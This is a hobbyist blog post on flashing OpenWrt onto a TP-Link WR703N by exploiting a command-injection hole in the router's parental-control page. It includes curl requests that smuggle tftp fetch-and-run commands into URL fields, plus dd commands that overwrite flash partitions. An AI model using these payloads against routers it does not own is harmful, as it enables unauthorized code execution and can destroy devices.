Flashing OpenWrt on a TP-Link 703n v1.7 or later
I have had my TP-Link 703n for quite a while now. I actually have other routers at home with better performance than the 703N; the reasons I bought this one are, first, that it is tiny, smaller than my palm, and second, that it can be flashed with all sorts of embedded Linux systems. Reviews of the 703N online are generally positive; everyone calls it an entry-level device, and luckily it is also cheap, so I picked one up.
But the router ships with the latest official firmware, and someone like me who likes to tinker could hardly stop there. Searching online, I found that TP-Link 703n v1.7 and later cannot be flashed with OpenWrt directly, only with a programmer, which was disheartening: I had just bought the thing and did not want to take a soldering iron to it. Then, while searching on Google, I came across an article; here is the original text.
- Upgrade your new WR703N V1.17.1 to openwrt.
- WARNING: THIS CAN BRICK YOUR DEVICE. DO NOT RELY ON ANY OF THIS INFORMATION.
- These are just hints how I did it.
- If you have no experience with wr703n's. Just buy a MR3020.
- You'll need:
- * A FTP server (in my case 192.168.1.9, I advise to use the same IP or understand what the hell you're doing)
- * An unix or mac workstation with curl (can be the same box)
- * A general knowledge of unix commands.
- * An openwrt image. I make my own but stock 12.09 might work.
- * A statically compiled busybox binary for MIPS.
- The general idea:
- * Put a script on your tp-link wr703n
- * Put a better busybox on your tp-link wr703n
- * Trick the wr703n into executing some commands to run this script.
- The script:
- * get the first and second part of the image from tftp
- * flash the first part of the image (1024k) to the mtd partition named kernel
- * flash the rest of the image (2819k) to the mtd partition named rootfs
- * reboot the box with openwrt on it.
- First setup the tftp server and put the following files there:
- === file aa cut from here ======
- cd /tmp
- tftp -gl i1 192.168.1.9
- tftp -gl i2 192.168.1.9
- tftp -gl busybox 192.168.1.9
- chmod 755 busybox
- ./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
- ./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
- ./busybox reboot -f
- echo blaaat
- === /file aa cut to here =======
- Put the rest also there:
- * busybox
- * openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin
- Cut the openwrt image into 2 parts (yes, these commands):
- These commands can take a while since I had no interest in calculating a better block size.
- dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i1 bs=1 count=1048576
- dd if=openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin of=i2 bs=1 skip=1048576
- now there are 4 files in your TFTP directory: aa, busybox, i1, i2
- Now let's take a router and have it set to the factory settings.
- Run these commands on your workstation.
- # !!DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).!!
- # First it wants a password set, let's do that. (the password is admin42 after this).
- curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=true' 'http://192.168.1.1/'
- # Secondly it wants to have parental control enabled (probably the once-in-a-lifetime opportunity to use this).
- curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'
- # That being done, now all we need is to just simply exploit the router.
- # In readable form it does:
- # cd /tmp ; tftp -gl aa 192.168.1.9; sh aa
- # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
- curl -o - -b 'tLargeScreenP=1; subType=pcSub; Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D; ChgPwdSubTag=' --referer 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1' 'http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.9;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6'
- # DO NOT POWER OFF YOUR ROUTER, IT WILL BRICK (and you need 3.3V serial to revive it).
- Just wait until it starts to blink, then openwrt is loading. Depending on your image you can reach it on its mac address.
- If you have no experience with wr703n's. Just buy a MR3020.
It seems to be an article from a Russian forum, using a web vulnerability to flash the 703N; I immediately felt much better.
Restore the router to factory settings: press the small hole on the router with a SIM-eject pin for 10 seconds.
1. Change the computer's IP to 192.168.1.100
2. Go into that directory and run tftp32 first
3. Then open a cmd command prompt, cd into that directory, and type the command
curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=true" "http://192.168.1.1/"
4. When the prompt returns, type
curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1"
5. When the prompt returns, type
curl -o - -b "tLargeScreenP=1;subType=pcSub;Authorization=Basic%20YWRtaW46YWRtaW40Mg%3D%3D;ChgPwdSubTag=" --referer "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?Modify=0&Page=1" "http://192.168.1.1/userRpm/ParentCtrlRpm.htm?child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test&url_0=;cd%20/tmp;&url_1=;tftp%20-gl%20aa%20192.168.1.100;&url_2=;sh%20aa;&url_3=&url_4=&url_5=&url_6=&url_7=&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6"
Wait patiently for about 3 minutes and the flash is done.
Right after flashing, before any configuration, the router can only be reached over the LAN port.
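The preparation described by the quoted article and the steps above, as an added example (my own bash script, not code from the original post or from the quoted article): it splits the factory image at the 1 MiB kernel boundary with 64 KiB blocks instead of bs=1, checks that the remainder fits the 2819k rootfs figure the article gives and that the two halves reassemble byte for byte, writes the `aa` script for a chosen TFTP server address, and prints the three curl requests instead of sending them, so the exact bytes can be checked before they are pointed at a router. The 1 MiB kernel size, the 2819k rootfs size, the `admin42` password and every cookie and URL parameter are taken from the article; the script name `prep.sh`, the `split_image`/`build_inject_url` helper names, and the guess that a per-field length limit is why the injected command is spread over url_0..url_2 are my own assumptions.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post or the quoted article.
# Prepares the TFTP directory and prints (does not send) the three requests.
# Assumed from the article: kernel partition = 1 MiB, rootfs part = 2819k.
set -u

KERNEL_BYTES=1048576               # bytes flashed to /dev/mtdblock1 ("kernel")
ROOTFS_MAX_BYTES=$((2819 * 1024))  # size the article gives for the rootfs part
ROUTER=192.168.1.1

# Split <factory.bin> into <outdir>/i1 (first 1 MiB) and <outdir>/i2 (the rest)
# using 64 KiB blocks; returns 1 if the image would not fit the two partitions
# or if the two halves do not reassemble to the original byte for byte.
split_image() {
  local img=$1 out=$2 size
  size=$(( $(wc -c < "$img") ))
  if [ "$size" -le "$KERNEL_BYTES" ] || [ $((size - KERNEL_BYTES)) -gt "$ROOTFS_MAX_BYTES" ]; then
    echo "image is $size bytes; does not fit 1024k kernel + 2819k rootfs" >&2
    return 1
  fi
  dd if="$img" of="$out/i1" bs=65536 count=16 2>/dev/null || return 1  # 16 x 64 KiB = 1 MiB
  dd if="$img" of="$out/i2" bs=65536 skip=16 2>/dev/null || return 1   # everything after 1 MiB
  cat "$out/i1" "$out/i2" | cmp -s "$img" -
}

# Write the script the router fetches as "aa": the article's commands with
# the TFTP server address substituted.
write_flash_script() {
  local tftp_ip=$1 out=$2
  cat > "$out/aa" <<EOF
cd /tmp
tftp -gl i1 $tftp_ip
tftp -gl i2 $tftp_ip
tftp -gl busybox $tftp_ip
chmod 755 busybox
./busybox dd if=i1 of=/dev/mtdblock1 conv=fsync
./busybox dd if=i2 of=/dev/mtdblock2 conv=fsync
./busybox reboot -f
EOF
}

# The Authorization cookie is "Basic " + base64("admin:<password>") with the
# space and the '=' padding percent-encoded; admin42 gives the article's value.
auth_cookie() {
  local b64
  b64=$(printf 'admin:%s' "$1" | base64 | tr -d '\n')
  printf 'Authorization=Basic%%20%s' "${b64//=/%3D}"
}

# Build the ParentCtrlRpm.htm URL carrying the injected commands. Each command
# sits in its own url_N field wrapped in ';' (the article spreads the three
# commands over url_0..url_2; a per-field length limit is the assumed reason).
# Only spaces are encoded, exactly as in the article's payload.
build_inject_url() {
  local tftp_ip=$1 i
  local cmds=("cd /tmp" "tftp -gl aa $tftp_ip" "sh aa")
  local q="child_mac=00-00-00-00-00-01&lan_lists=888&url_comment=test"
  for i in 0 1 2 3 4 5 6 7; do
    if [ "$i" -lt "${#cmds[@]}" ]; then
      q="$q&url_$i=;${cmds[$i]// /%20};"
    else
      q="$q&url_$i="
    fi
  done
  q="$q&scheds_lists=255&enable=1&Changed=1&SelIndex=0&Page=1&rule_mode=0&Save=%B1%A3+%B4%E6"
  printf 'http://%s/userRpm/ParentCtrlRpm.htm?%s' "$ROUTER" "$q"
}

# Print the three requests in the order the article sends them.
print_requests() {
  local tftp_ip=$1 auth base
  auth=$(auth_cookie admin42)
  base="http://$ROUTER/userRpm/ParentCtrlRpm.htm"
  echo "curl -o - -b 'tLargeScreenP=1; subType=pcSub; $auth; ChgPwdSubTag=true' 'http://$ROUTER/'"
  echo "curl -o - -b 'tLargeScreenP=1; subType=pcSub; $auth; ChgPwdSubTag=' --referer '$base' '$base?ctrl_enable=1&parent_mac_addr=00-00-00-00-00-02&Page=1'"
  echo "curl -o - -b 'tLargeScreenP=1; subType=pcSub; $auth; ChgPwdSubTag=' --referer '$base?Modify=0&Page=1' '$(build_inject_url "$tftp_ip")'"
}

# Usage: ./prep.sh prepare <factory.bin> <tftpdir> <tftp-server-ip>
if [ "${1-}" = prepare ]; then
  split_image "$2" "$3" && write_flash_script "$4" "$3" && print_requests "$4"
fi
```

Running `./prep.sh prepare openwrt-ar71xx-generic-tl-wr703n-v1-squashfs-factory.bin tftpdir 192.168.1.100` leaves aa, i1 and i2 in `tftpdir` (busybox still has to be copied there by hand) and prints the three curl lines with the address substituted. The trailing `Save=%B1%A3+%B4%E6` is the GBK encoding of the Chinese "保存" (Save) button label, which is why the payload is tied to the Chinese firmware build.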
That completes flashing OpenWrt; as it happens, in the end I still used a programmer clip.
This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.